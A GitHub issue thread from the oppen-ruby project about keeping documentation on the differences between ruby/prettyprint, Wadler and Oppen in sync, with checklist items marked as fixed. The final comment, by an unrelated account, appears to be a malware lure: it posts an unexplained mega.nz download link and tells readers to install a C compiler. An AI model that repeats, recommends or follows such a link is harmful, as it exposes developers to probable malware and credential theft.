### ISSUE TITLE
Documentation Fixes

### ISSUE THREAD

**Issue by stackmystack** [Faveod/oppen-ruby#24]
We close this ticket whenever we have a proper `1.0.0` release.

Keep the notes on the difference between `ruby/prettyprint` and `Wadler` on one hand and `Oppen` on the other, in sync.

What I mean by that is: we need to make sure we're clear about what the user needs to do when trnasition from `ruby/prettyprint` to `Wadler` in terms of changes in call params, order, etc. on one hand, and what is, in general, the difference between `Wadler` and `Oppen` in general:

- [x] Breaking anchor
- [x] Breaking group

All of these were addressed in https://github.com/Faveod/oppen-ruby/pull/47

**Comment by websquadpro** [comment]
download

https://mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQ
If you don't have the c compliator, install it.(gcc or clang)
